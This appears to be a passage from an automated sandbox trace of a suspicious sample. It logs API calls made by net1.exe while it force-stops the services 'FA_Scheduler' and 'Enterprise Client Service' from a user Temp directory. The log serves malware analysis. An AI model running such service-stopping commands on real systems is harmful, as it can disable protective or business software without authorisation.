Buffer=0x10f7b4 | out: Buffer=0x10f7b4*=0x221b00) returned 0x0 [0120.039] _fileno (_File=0x77032900) returned -2 [0120.039] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0120.039] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0120.039] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0120.039] _wcsicmp (_String1="config", _String2="stop") returned -16 [0120.040] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0120.040] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0120.040] _wcsicmp (_String1="file", _String2="stop") returned -13 [0120.040] _wcsicmp (_String1="files", _String2="stop") returned -13 [0120.040] _wcsicmp (_String1="group", _String2="stop") returned -12 [0120.040] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0120.040] _wcsicmp (_String1="help", _String2="stop") returned -11 [0120.040] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0120.040] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0120.040] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0120.040] _wcsicmp (_String1="session", _String2="stop") returned -15 [0120.040] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0120.040] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0120.040] _wcsicmp (_String1="share", _String2="stop") returned -12 [0120.040] _wcsicmp (_String1="start", _String2="stop") returned -14 [0120.040] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0120.040] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0120.040] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0120.040] _wcsicmp (_String1="accounts", _String2="FA_Scheduler") returned -5 [0120.040] _wcsicmp (_String1="computer", _String2="FA_Scheduler") returned -3 [0120.040] _wcsicmp (_String1="config", _String2="FA_Scheduler") returned -3 [0120.040] _wcsicmp (_String1="continue", _String2="FA_Scheduler") returned -3 [0120.040] _wcsicmp (_String1="cont", _String2="FA_Scheduler") returned -3 [0120.040] _wcsicmp (_String1="file", _String2="FA_Scheduler") returned 8 [0120.040] _wcsicmp (_String1="files", _String2="FA_Scheduler") returned 8 [0120.040] _wcsicmp (_String1="group", _String2="FA_Scheduler") returned 1 [0120.040] _wcsicmp (_String1="groups", _String2="FA_Scheduler") returned 1 [0120.040] _wcsicmp (_String1="help", _String2="FA_Scheduler") returned 2 [0120.040] _wcsicmp (_String1="helpmsg", _String2="FA_Scheduler") returned 2 [0120.041] _wcsicmp (_String1="localgroup", _String2="FA_Scheduler") returned 6 [0120.041] _wcsicmp (_String1="pause", _String2="FA_Scheduler") returned 10 [0120.041] _wcsicmp (_String1="session", _String2="FA_Scheduler") returned 13 [0120.041] _wcsicmp (_String1="sessions", _String2="FA_Scheduler") returned 13 [0120.041] _wcsicmp (_String1="sess", _String2="FA_Scheduler") returned 13 [0120.041] _wcsicmp (_String1="share", _String2="FA_Scheduler") returned 13 [0120.041] _wcsicmp (_String1="start", _String2="FA_Scheduler") returned 13 [0120.041] _wcsicmp (_String1="stats", _String2="FA_Scheduler") returned 13 [0120.041] _wcsicmp (_String1="statistics", _String2="FA_Scheduler") returned 13 [0120.041] _wcsicmp (_String1="stop", _String2="FA_Scheduler") returned 13 [0120.041] _wcsicmp (_String1="time", _String2="FA_Scheduler") returned 14 [0120.041] _wcsicmp (_String1="user", _String2="FA_Scheduler") returned 15 [0120.041] _wcsicmp (_String1="users", _String2="FA_Scheduler") returned 15 [0120.041] _wcsicmp (_String1="msg", _String2="FA_Scheduler") returned 7 [0120.041] _wcsicmp (_String1="messenger", _String2="FA_Scheduler") returned 7 [0120.041] _wcsicmp (_String1="receiver", _String2="FA_Scheduler") returned 12 [0120.041] _wcsicmp (_String1="rcv", _String2="FA_Scheduler") returned 12 [0120.041] _wcsicmp (_String1="netpopup", _String2="FA_Scheduler") returned 8 [0120.041] _wcsicmp (_String1="redirector", _String2="FA_Scheduler") returned 12 [0120.041] _wcsicmp (_String1="redir", _String2="FA_Scheduler") returned 12 [0120.041] _wcsicmp (_String1="rdr", _String2="FA_Scheduler") returned 12 [0120.041] _wcsicmp (_String1="workstation", _String2="FA_Scheduler") returned 17 [0120.041] _wcsicmp (_String1="work", _String2="FA_Scheduler") returned 17 [0120.041] _wcsicmp (_String1="wksta", _String2="FA_Scheduler") returned 17 [0120.041] _wcsicmp (_String1="prdr", _String2="FA_Scheduler") returned 10 [0120.041] _wcsicmp (_String1="devrdr", _String2="FA_Scheduler") returned -2 [0120.041] _wcsicmp (_String1="lanmanworkstation", _String2="FA_Scheduler") returned 6 [0120.041] _wcsicmp (_String1="server", _String2="FA_Scheduler") returned 13 [0120.042] _wcsicmp (_String1="svr", _String2="FA_Scheduler") returned 13 [0120.042] _wcsicmp (_String1="srv", _String2="FA_Scheduler") returned 13 [0120.042] _wcsicmp (_String1="lanmanserver", _String2="FA_Scheduler") returned 6 [0120.042] _wcsicmp (_String1="alerter", _String2="FA_Scheduler") returned -5 [0120.042] _wcsicmp (_String1="netlogon", _String2="FA_Scheduler") returned 8 [0120.042] _wcsupr (in: _String="FA_Scheduler" | out: _String="FA_SCHEDULER") returned="FA_SCHEDULER" [0120.042] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x2254b0 [0120.046] GetServiceKeyNameW (in: hSCManager=0x2254b0, lpDisplayName="FA_SCHEDULER", lpServiceName=0x39aaf0, lpcchBuffer=0x10f750 | out: lpServiceName="", lpcchBuffer=0x10f750) returned 0 [0120.047] _wcsicmp (_String1="msg", _String2="FA_SCHEDULER") returned 7 [0120.047] _wcsicmp (_String1="messenger", _String2="FA_SCHEDULER") returned 7 [0120.047] _wcsicmp (_String1="receiver", _String2="FA_SCHEDULER") returned 12 [0120.048] _wcsicmp (_String1="rcv", _String2="FA_SCHEDULER") returned 12 [0120.048] _wcsicmp (_String1="redirector", _String2="FA_SCHEDULER") returned 12 [0120.048] _wcsicmp (_String1="redir", _String2="FA_SCHEDULER") returned 12 [0120.048] _wcsicmp (_String1="rdr", _String2="FA_SCHEDULER") returned 12 [0120.048] _wcsicmp (_String1="workstation", _String2="FA_SCHEDULER") returned 17 [0120.048] _wcsicmp (_String1="work", _String2="FA_SCHEDULER") returned 17 [0120.048] _wcsicmp (_String1="wksta", _String2="FA_SCHEDULER") returned 17 [0120.048] _wcsicmp (_String1="prdr", _String2="FA_SCHEDULER") returned 10 [0120.048] _wcsicmp (_String1="devrdr", _String2="FA_SCHEDULER") returned -2 [0120.048] _wcsicmp (_String1="lanmanworkstation", _String2="FA_SCHEDULER") returned 6 [0120.048] _wcsicmp (_String1="server", _String2="FA_SCHEDULER") returned 13 [0120.048] _wcsicmp (_String1="svr", _String2="FA_SCHEDULER") returned 13 [0120.048] _wcsicmp (_String1="srv", _String2="FA_SCHEDULER") returned 13 [0120.048] _wcsicmp (_String1="lanmanserver", _String2="FA_SCHEDULER") returned 6 [0120.048] _wcsicmp (_String1="alerter", _String2="FA_SCHEDULER") returned -5 [0120.048] _wcsicmp (_String1="netlogon", _String2="FA_SCHEDULER") returned 8 [0120.048] NetServiceControl (in: servername=0x0, service="FA_SCHEDULER", opcode=0x0, arg=0x0, bufptr=0x10f74c | out: bufptr=0x10f74c) returned 0x889 [0120.050] wcscpy_s (in: _Destination=0x39a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0120.050] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74860000 [0120.051] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74860000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x39b338, nSize=0x800, Arguments=0x399dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0120.052] GetFileType (hFile=0x0) returned 0x0 [0120.052] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x223ed0 [0120.052] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x223ed0, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0120.052] WriteFile (in: hFile=0x0, lpBuffer=0x223ed0, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x10f68c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x10f68c, lpOverlapped=0x0) returned 0 [0120.052] LocalFree (hMem=0x223ed0) returned 0x0 [0120.052] GetFileType (hFile=0x0) returned 0x0 [0120.052] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x226178 [0120.052] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x226178, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n\"", lpUsedDefaultChar=0x0) returned 2 [0120.053] WriteFile (in: hFile=0x0, lpBuffer=0x226178, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x10f68c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x10f68c, lpOverlapped=0x0) returned 0 [0120.053] LocalFree (hMem=0x226178) returned 0x0 [0120.053] _ultow (in: _Dest=0x889, _Radix=1111740 | out: _Dest=0x889) returned="2185" [0120.053] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74860000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x39b338, nSize=0x800, Arguments=0x399dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0120.053] GetFileType (hFile=0x0) returned 0x0 [0120.053] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x226178 [0120.053] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x226178, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0120.053] WriteFile (in: hFile=0x0, lpBuffer=0x226178, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x10f698, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x10f698, lpOverlapped=0x0) returned 0 [0120.053] LocalFree (hMem=0x226178) returned 0x0 [0120.053] GetFileType (hFile=0x0) returned 0x0 [0120.053] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x226178 [0120.053] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x226178, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n\"", lpUsedDefaultChar=0x0) returned 2 [0120.053] WriteFile (in: hFile=0x0, lpBuffer=0x226178, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x10f698, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x10f698, lpOverlapped=0x0) returned 0 [0120.053] LocalFree (hMem=0x226178) returned 0x0 [0120.054] NetApiBufferFree (Buffer=0x221ae8) returned 0x0 [0120.054] NetApiBufferFree (Buffer=0x221b00) returned 0x0 [0120.054] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop FA_Scheduler /y" [0120.054] exit (_Code=2) Process: id = "238" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x4b502000" os_pid = "0xdec" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "95" os_parent_pid = "0xfa0" cmd_line = "C:\\Windows\\system32\\net1 stop “Enterprise Client Service” /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 632 os_tid = 0x634 [0119.869] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fb84 | out: lpSystemTimeAsFileTime=0x18fb84*(dwLowDateTime=0x1b30cb30, dwHighDateTime=0x1d6f0d1)) [0119.869] GetCurrentProcessId () returned 0xdec [0119.869] GetCurrentThreadId () returned 0x634 [0119.869] GetTickCount () returned 0x11513ef [0119.869] QueryPerformanceCounter (in: lpPerformanceCount=0x18fb7c | out: lpPerformanceCount=0x18fb7c*=23896983978) returned 1 [0119.869] GetModuleHandleA (lpModuleName=0x0) returned 0x380000 [0119.869] __set_app_type (_Type=0x1) [0119.869] __p__fmode () returned 0x770331f4 [0119.869] __p__commode () returned 0x770331fc [0119.870] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x38ffe6) returned 0x0 [0119.870] __getmainargs (in: _Argc=0x399064, _Argv=0x39906c, _Env=0x399068, _DoWildCard=0, _StartInfo=0x399024 | out: _Argc=0x399064, _Argv=0x39906c, _Env=0x399068) returned 0 [0119.870] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0119.870] GetConsoleOutputCP () returned 0x1b5 [0119.870] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x399080 | out: lpCPInfo=0x399080) returned 1 [0119.870] SetThreadUILanguage (LangId=0x0) returned 0x409 [0120.057] sprintf_s (in: _DstBuf=0x18fb3c, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0120.057] setlocale (category=0, locale=".437") returned="English_United States.437" [0120.059] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3f8 [0120.059] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0120.060] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop “Enterprise Client Service” /y" [0120.060] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18f908, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0120.060] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0x0, Size=0x92) returned 0x4c4ad8 [0120.060] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0120.060] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x18fb0c | out: Buffer=0x18fb0c*=0x4c1b10) returned 0x0 [0120.060] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x18fb0c | out: Buffer=0x18fb0c*=0x4c1b28) returned 0x0 [0120.060] _fileno (_File=0x77032900) returned -2 [0120.060] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0120.060] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0120.060] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0120.060] _wcsicmp (_String1="config", _String2="stop") returned -16 [0120.060] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0120.060] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0120.060] _wcsicmp (_String1="file", _String2="stop") returned -13 [0120.060] _wcsicmp (_String1="files", _String2="stop") returned -13 [0120.061] _wcsicmp (_String1="group", _String2="stop") returned -12 [0120.061] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0120.061] _wcsicmp (_String1="help", _String2="stop") returned -11 [0120.061] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0120.061] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0120.061] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0120.061] _wcsicmp (_String1="session", _String2="stop") returned -15 [0120.061] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0120.061] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0120.061] _wcsicmp (_String1="share", _String2="stop") returned -12 [0120.061] _wcsicmp (_String1="start", _String2="stop") returned -14 [0120.061] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0120.061] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0120.061] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0120.061] _wcsicmp (_String1="accounts", _String2="“Enterprise") returned -8123 [0120.061] _wcsicmp (_String1="computer", _String2="“Enterprise") returned -8121 [0120.061] _wcsicmp (_String1="config", _String2="“Enterprise") returned -8121 [0120.061] _wcsicmp (_String1="continue", _String2="“Enterprise") returned -8121 [0120.061] _wcsicmp (_String1="cont", _String2="“Enterprise") returned -8121 [0120.061] _wcsicmp (_String1="file", _String2="“Enterprise") returned -8118 [0120.061] _wcsicmp (_String1="files", _String2="“Enterprise") returned -8118 [0120.061] _wcsicmp (_String1="group", _String2="“Enterprise") returned -8117 [0120.061] _wcsicmp (_String1="groups", _String2="“Enterprise") returned -8117 [0120.061] _wcsicmp (_String1="help", _String2="“Enterprise") returned -8116 [0120.061] _wcsicmp (_String1="helpmsg", _String2="“Enterprise") returned -8116 [0120.061] _wcsicmp (_String1="localgroup", _String2="“Enterprise") returned -8112 [0120.062] _wcsicmp (_String1="pause", _String2="“Enterprise") returned -8108 [0120.062] _wcsicmp (_String1="session", _String2="“Enterprise") returned -8105 [0120.062] _wcsicmp (_String1="sessions", _String2="“Enterprise") returned -8105 [0120.062] _wcsicmp (_String1="sess", _String2="“Enterprise") returned -8105 [0120.062] _wcsicmp (_String1="share", _String2="“Enterprise") returned -8105 [0120.062] _wcsicmp (_String1="start", _String2="“Enterprise") returned -8105 [0120.062] _wcsicmp (_String1="stats", _String2="“Enterprise") returned -8105 [0120.062] _wcsicmp (_String1="statistics", _String2="“Enterprise") returned -8105 [0120.062] _wcsicmp (_String1="stop", _String2="“Enterprise") returned -8105 [0120.062] _wcsicmp (_String1="time", _String2="“Enterprise") returned -8104 [0120.062] _wcsicmp (_String1="user", _String2="“Enterprise") returned -8103 [0120.062] _wcsicmp (_String1="users", _String2="“Enterprise") returned -8103 [0120.062] _wcsicmp (_String1="msg", _String2="“Enterprise") returned -8111 [0120.062] _wcsicmp (_String1="messenger", _String2="“Enterprise") returned -8111 [0120.062] _wcsicmp (_String1="receiver", _String2="“Enterprise") returned -8106 [0120.062] _wcsicmp (_String1="rcv", _String2="“Enterprise") returned -8106 [0120.062] _wcsicmp (_String1="netpopup", _String2="“Enterprise") returned -8110 [0120.062] _wcsicmp (_String1="redirector", _String2="“Enterprise") returned -8106 [0120.062] _wcsicmp (_String1="redir", _String2="“Enterprise") returned -8106 [0120.062] _wcsicmp (_String1="rdr", _String2="“Enterprise") returned -8106 [0120.062] _wcsicmp (_String1="workstation", _String2="“Enterprise") returned -8101 [0120.062] _wcsicmp (_String1="work", _String2="“Enterprise") returned -8101 [0120.062] _wcsicmp (_String1="wksta", _String2="“Enterprise") returned -8101 [0120.062] _wcsicmp (_String1="prdr", _String2="“Enterprise") returned -8108 [0120.062] _wcsicmp (_String1="devrdr", _String2="“Enterprise") returned -8120 [0120.062] _wcsicmp (_String1="lanmanworkstation", _String2="“Enterprise") returned -8112 [0120.062] _wcsicmp (_String1="server", _String2="“Enterprise") returned -8105 [0120.063] _wcsicmp (_String1="svr", _String2="“Enterprise") returned -8105 [0120.063] _wcsicmp (_String1="srv", _String2="“Enterprise") returned -8105 [0120.063] _wcsicmp (_String1="lanmanserver", _String2="“Enterprise") returned -8112 [0120.063] _wcsicmp (_String1="alerter", _String2="“Enterprise") returned -8123 [0120.063] _wcsicmp (_String1="netlogon", _String2="“Enterprise") returned -8110 [0120.063] _wcsicmp (_String1="accounts", _String2="Client") returned -2 [0120.063] _wcsicmp (_String1="computer", _String2="Client") returned 3 [0120.063] _wcsicmp (_String1="config", _String2="Client") returned 3 [0120.063] _wcsicmp (_String1="continue", _String2="Client") returned 3 [0120.063] _wcsicmp (_String1="cont", _String2="Client") returned 3 [0120.063] _wcsicmp (_String1="file", _String2="Client") returned 3 [0120.063] _wcsicmp (_String1="files", _String2="Client") returned 3 [0120.063] _wcsicmp (_String1="group", _String2="Client") returned 4 [0120.063] _wcsicmp (_String1="groups", _String2="Client") returned 4 [0120.063] _wcsicmp (_String1="help", _String2="Client") returned 5 [0120.063] _wcsicmp (_String1="helpmsg", _String2="Client") returned 5 [0120.063] _wcsicmp (_String1="localgroup", _String2="Client") returned 9 [0120.063] _wcsicmp (_String1="pause", _String2="Client") returned 13 [0120.063] _wcsicmp (_String1="session", _String2="Client") returned 16 [0120.063] _wcsicmp (_String1="sessions", _String2="Client") returned 16 [0120.063] _wcsicmp (_String1="sess", _String2="Client") returned 16 [0120.063] _wcsicmp (_String1="share", _String2="Client") returned 16 [0120.063] _wcsicmp (_String1="start", _String2="Client") returned 16 [0120.063] _wcsicmp (_String1="stats", _String2="Client") returned 16 [0120.064] _wcsicmp (_String1="statistics", _String2="Client") returned 16 [0120.064] _wcsicmp (_String1="stop", _String2="Client") returned 16 [0120.064] _wcsicmp (_String1="time", _String2="Client") returned 17 [0120.064] _wcsicmp (_String1="user", _String2="Client") returned 18 [0120.064] _wcsicmp (_String1="users", _String2="Client") returned 18 [0120.064] _wcsicmp (_String1="msg", _String2="Client") returned 10 [0120.064] _wcsicmp (_String1="messenger", _String2="Client") returned 10 [0120.064] _wcsicmp (_String1="receiver", _String2="Client") returned 15 [0120.064] _wcsicmp (_String1="rcv", _String2="Client") returned 15 [0120.064] _wcsicmp (_String1="netpopup", _String2="Client") returned 11 [0120.064] _wcsicmp (_String1="redirector", _String2="Client") returned 15 [0120.064] _wcsicmp (_String1="redir", _String2="Client") returned 15 [0120.064] _wcsicmp (_String1="rdr", _String2="Client") returned 15 [0120.064] _wcsicmp (_String1="workstation", _String2="Client") returned 20 [0120.064] _wcsicmp (_String1="work", _String2="Client") returned 20 [0120.064] _wcsicmp (_String1="wksta", _String2="Client") returned 20 [0120.064] _wcsicmp (_String1="prdr", _String2="Client") returned 13 [0120.064] _wcsicmp (_String1="devrdr", _String2="Client") returned 1 [0120.064] _wcsicmp (_String1="lanmanworkstation", _String2="Client") returned 9 [0120.064] _wcsicmp (_String1="server", _String2="Client") returned 16 [0120.064] _wcsicmp (_String1="svr", _String2="Client") returned 16 [0120.064] _wcsicmp (_String1="srv", _String2="Client") returned 16 [0120.064] _wcsicmp (_String1="lanmanserver", _String2="Client") returned 9 [0120.064] _wcsicmp (_String1="alerter", _String2="Client") returned -2 [0120.064] _wcsicmp (_String1="netlogon", _String2="Client") returned 11 [0120.064] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0120.065] SetThreadUILanguage (LangId=0x0) returned 0x409 [0120.065] wcscpy_s (in: _Destination=0x18f60c, _SizeInWords=0xf, _Source="neth.dll" | out: _Destination="neth.dll") returned 0x0 [0120.065] LoadLibraryW (lpLibFileName="neth.dll") returned 0x74420000 [0120.066] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74420000, dwMessageId=0xc66, dwLanguageId=0x0, lpBuffer=0x18f608, nSize=0x0, Arguments=0x18f604 | out: lpBuffer="勀Lneth.dll") returned 0xff [0120.068] wcstok (in: _String="CONTINUE: CONT$\r\nFILE: FILES$\r\nGROUP: GROUPS$\r\nREPLICATOR: REPL, REPLICATOR$\r\nSESSION: SESSIONS, SESS$\r\nSTATISTICS: STATS$\r\nUSER: USERS$\r\nWORKSTATION: REDIRECTOR, REDIR, RDR, WORK, WKSTA, PRDR, DEVRDR$\r\nSERVER: SVR, SRV$\r\n", _Delimiter="$", _Context=0x3d6 | out: _String="CONTINUE: CONT", _Context=0x3d6) returned="CONTINUE: CONT" [0120.068] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nFILE: FILES" [0120.068] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nGROUP: GROUPS" [0120.068] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nREPLICATOR: REPL, REPLICATOR" [0120.068] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSESSION: SESSIONS, SESS" [0120.068] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSTATISTICS: STATS" [0120.068] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nUSER: USERS" [0120.068] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nWORKSTATION: REDIRECTOR, REDIR, RDR, WORK, WKSTA, PRDR, DEVRDR" [0120.068] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSERVER: SVR, SRV" [0120.068] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\n" [0120.068] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0120.068] wcstok (in: _String="CONTINUE: CONT", _Delimiter=":,$", _Context=0x3d6 | out: _String="CONTINUE", _Context=0x3d6) returned="CONTINUE" [0120.068] wcsspn (_String="CONTINUE", _Control="\x09\n\x0b\x0c\r ") returned 0x0 [0120.068] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" CONT" [0120.068] wcsspn (_String=" CONT", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0120.068] _wcsicmp (_String1="CONT", _String2="stop") returned -16 [0120.069] _wcsicmp (_String1="CONT", _String2="“Enterprise") returned -8121 [0120.069] _wcsicmp (_String1="CONT", _String2="Client") returned 3 [0120.069] _wcsicmp (_String1="CONT", _String2="Service”") returned -16 [0120.069] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0120.069] wcstok (in: _String="\r\nFILE: FILES", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nFILE", _Context=0x3d6) returned="\r\nFILE" [0120.069] wcsspn (_String="\r\nFILE", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0120.069] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" FILES" [0120.069] wcsspn (_String=" FILES", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0120.069] _wcsicmp (_String1="FILES", _String2="stop") returned -13 [0120.069] _wcsicmp (_String1="FILES", _String2="“Enterprise") returned -8118 [0120.069] _wcsicmp (_String1="FILES", _String2="Client") returned 3 [0120.069] _wcsicmp (_String1="FILES", _String2="Service”") returned -13 [0120.069] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0120.069] wcstok (in: _String="\r\nGROUP: GROUPS", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nGROUP", _Context=0x3d6) returned="\r\nGROUP" [0120.069] wcsspn (_String="\r\nGROUP", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0120.069] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" GROUPS" [0120.069] wcsspn (_String=" GROUPS", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0120.069] _wcsicmp (_String1="GROUPS", _String2="stop") returned -12 [0120.069] _wcsicmp (_String1="GROUPS", _String2="“Enterprise") returned -8117 [0120.069] _wcsicmp (_String1="GROUPS", _String2="Client") returned 4 [0120.069] _wcsicmp (_String1="GROUPS", _String2="Service”") returned -12 [0120.069] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0120.069] wcstok (in: _String="\r\nREPLICATOR: REPL, REPLICATOR", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nREPLICATOR", _Context=0x3d6) returned="\r\nREPLICATOR" [0120.069] wcsspn (_String="\r\nREPLICATOR", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0120.069] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" REPL" [0120.069] wcsspn (_String=" REPL", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0120.069] _wcsicmp (_String1="REPL", _String2="stop") returned -1 [0120.069] _wcsicmp (_String1="REPL", _String2="“Enterprise") returned -8106 [0120.070] _wcsicmp (_String1="REPL", _String2="Client") returned 15 [0120.070] _wcsicmp (_String1="REPL", _String2="Service”") returned -1 [0120.070] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" REPLICATOR" [0120.070] wcsspn (_String=" REPLICATOR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0120.070] _wcsicmp (_String1="REPLICATOR", _String2="stop") returned -1 [0120.070] _wcsicmp (_String1="REPLICATOR", _String2="“Enterprise") returned -8106 [0120.070] _wcsicmp (_String1="REPLICATOR", _String2="Client") returned 15 [0120.070] _wcsicmp (_String1="REPLICATOR", _String2="Service”") returned -1 [0120.070] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 